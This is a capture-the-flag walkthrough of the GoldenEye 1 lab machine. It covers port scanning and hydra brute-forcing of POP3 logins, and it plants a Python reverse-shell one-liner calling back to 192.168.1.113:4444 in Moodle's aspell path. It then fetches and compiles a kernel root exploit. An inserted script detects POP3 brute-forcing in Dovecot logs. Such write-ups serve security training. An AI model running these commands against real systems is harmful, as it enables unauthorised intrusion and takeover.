# Golden Eye 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/GEv1 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.68 seconds

```

```
nmap -p- -Pn 192.168.1.116 
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 05:18 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00067s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:E4:96:14 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

```

We can see that there are two more open ports on the server whose service nmap could not identify.

Let's open the IP address in a web browser.

![](/files/-M80mU0x_rRluYzvaOvd)

Let's navigate to `/sev-home`.

![](/files/-M80n1-lKQk68lc-fl0Y)

If we go back to the main page and open the browser's inspector, we can see a JavaScript file.

![](/files/-M80nl-7jjXW1ZoXJa68)

We can see there is an encrypted password. I copied it and pasted it into the Google search bar, and surprisingly got this:

![](/files/-M80uy0R3JkQ3SVWsQ1_)

Obviously the username is `boris`, and we can log in.

![](/files/-M80vHXpHgFia8G86oGq)

We can see that there is a POP3 server running.

If we use nmap to enumerate both of the unknown ports:

```
nmap -sV -p 55006,55007 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 10:28 EDT
Nmap scan report for 192.168.1.116
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
55007/tcp open  pop3        Dovecot pop3d
MAC Address: 00:0C:29:E4:96:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.42 seconds

```

We now know that port 55007 is running POP3.

## Exploitation

### Hydra

Then we can brute-force the POP3 passwords of `boris` and `natalya`:

```
hydra -l boris -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

```
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M80xtwCV16Ez8yFniDC)

![](/files/-M80yuU-2utL2baG_mjI)

Got the password! We can now log in to the POP3 server:

```
nc 192.168.1.116 55007
USER boris
PASS secret1!
LIST
RETR 1
RETR 2 
RETR 3
```

![](/files/-M80zCW_opDG9CuuKJPm)

Nothing seems very interesting here, so we move on to `natalya`.

Doing the same thing for `natalya` as we did for `boris`, we get something pretty interesting:

![](/files/-M80zlTmCSWD6k1SiO9R)

We got a set of credentials, and we need to add the server IP to `/etc/hosts` and navigate to `severnaya-station.com/gnocertdir`.

After doing that, we can open the browser and navigate to `severnaya-station.com/gnocertdir`.

![](/files/-M811SAadFmusruBd4Ey)

We can log in with the credentials given in the email.

Then we can navigate to Messages, where we can see that the username is `doak`.

![](/files/-M8122BvFJdb30jjvy-2)

Now we can take the username `doak` and brute-force it with hydra again:

```
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.1.116:55007
```

![](/files/-M813PD_Bt6fulmj6emi)
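Each of the hydra runs above (against `boris`, `natalya` and now `doak`) produces a burst of failed POP3 logins that Dovecot writes to the mail log. As an added defender-side example (not part of the original write-up), the script below flags any source IP with many failures inside a sliding window and lists the usernames it tried; the line format is modelled on Dovecot's `pop3-login` messages, and the sample lines, threshold and window are constructed assumptions rather than data from this box.

```python
import re
from collections import defaultdict
from datetime import datetime
# Dovecot pop3-login disconnect message (format modelled on real Dovecot logs).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"Disconnected \((?P<reason>[^)]*)\): user=<(?P<user>[^>]*)>, "
    r".*?rip=(?P<rip>[\d.]+)"
)
THRESHOLD = 5        # failed logins from one source IP ...
WINDOW_SECONDS = 60  # ... within this many seconds (tune to your traffic)

def parse_line(line):
    """Return (timestamp, user, rip) for a failed-auth line, else None."""
    m = LINE_RE.match(line)
    if not m or "auth failed" not in m.group("reason"):
        return None
    # syslog timestamps carry no year; 2020 is assumed to keep them sortable
    ts = datetime.strptime("2020 " + m.group("ts"), "%Y %b %d %H:%M:%S")
    return ts, m.group("user"), m.group("rip")

def detect_bruteforce(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """{source IP: sorted users tried} for IPs with >= threshold failures in a window."""
    per_ip = defaultdict(list)
    for ts, user, rip in filter(None, map(parse_line, lines)):
        per_ip[rip].append((ts, user))
    alerts = {}
    for rip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[rip] = sorted({u for _, u in events})
                break
    return alerts

# Constructed sample log: seven wordlist guesses against two users from one
# host in seven seconds, plus one typo and a good login from another host.
FAIL = ("{t} ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts "
        "in 2 secs): user=<{u}>, method=PLAIN, rip={ip}, lip=192.168.1.116")
SAMPLE_LOG = [
    FAIL.format(t=f"May 23 10:31:{i:02d}", u=u, ip="192.168.1.113")
    for i, u in enumerate(["boris"] * 4 + ["natalya"] * 3)
] + [
    FAIL.format(t="May 23 10:31:05", u="doak", ip="192.168.1.50"),
    "May 23 10:31:07 ubuntu dovecot: pop3-login: Login: user=<doak>, "
    "method=PLAIN, rip=192.168.1.50, lip=192.168.1.116",
]
```

Running `detect_bruteforce(SAMPLE_LOG)` returns only the scanning host, `{"192.168.1.113": ["boris", "natalya"]}`; the single typo from `192.168.1.50` stays below the threshold.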

We got the credentials, so we can go back to the POP3 server and log in.

![](/files/-M813zpGYh_oMxfLLRoT)

We got another set of credentials, and we go back to Moodle and log in.

![](/files/-M814HhBHFsJGSDHwxoQ)

We then go to Private files, where there is an `s3cret.txt`.

![](/files/-M814Sg1yoeCcZSloCWa)

After running `cat` on the file, we get this:

![](/files/-M815P3HdLucoP26QQ7r)

We can see that a picture leads to the admin credentials.

There is a link in the file; if we follow it, we get:

![](/files/-M815ZENcv3iJ0UxxbsS)

If we download the picture and use the `strings` command to list all printable content, we get this:

![](/files/-M816K4qLuqLDQg-GAm6)

We can see that there is a base64-encoded line.

After decoding it, we get:

![](/files/-M816UX7ooalZz4Vbc1h)

Let's log in to Moodle using the credentials we just got.

![](/files/-M817wXvNDPzY1tJ0qe1)

After playing around, I found out that under Site administration, Plugins, Text editors, there is a TinyMCE HTML editor.

We need to change the Spell engine from Google Spell to PSpellShell.

![](/files/-M818Rk730eblkM6kE-E)

Then, under Server and System paths, we can see that there is a Path to aspell setting.

### Reverse Shell

I tried using netcat, but it didn't work, so we change the setting to a Python reverse shell.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![](/files/-M818aW4kd6el8xq5cw0)

Then we set up a listener on our machine:

```
nc -nlvp 4444
```

Then we can go to Blog and add a new entry.

![](/files/-M81AF7hrJhImW8VjWYU)

After that, click the spell check button to get the reverse shell.

![](/files/-M81AKydMz7PtmiKxd30)

![](/files/-M81AOgAG-vWp-hI6yEp)

Then we can type a Python command to upgrade to a PTY shell:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

## Privilege Escalation

If we type `uname -a`, we can see that the kernel is out of date.

![](/files/-M81BLKhkAMNVFjVxRdT)

We can then run searchsploit on the kernel version.

![](/files/-M81BSwEeL52L4VB1A7m)

After that, we can copy the exploit to our directory. I then tried to transfer the file to the target machine, but `gcc` is not available on the target machine, although `cc` is.

So we need to change something in the exploit: change `gcc` to `cc`.

![](/files/-M81BmhYGlszbii6Kljc)

![](/files/-M81BrEMymU7sGNdf-Cx)

Then on our machine we can fire up SimpleHTTPServer using Python:

```
python -m SimpleHTTPServer
```

![](/files/-M81C7814oXEr_fhwcfi)

On the target machine, navigate to the `/tmp` directory and `wget` the file.

![](/files/-M81CQpKnEqTqrUGKqUx)

Then we can type:

```
cc 37292.c -o exploit
chmod +x exploit
./exploit
```

![](/files/-M81CiBjFhq3U1hcljId)

Navigate to `/root` and read `.flag.txt`.

![](/files/-M81CouHn-8k3kQkM9E5)

Then we can navigate to the URL it provides.

![](/files/-M81D0ltZFjL8VaKGrMZ)

Congratulations!
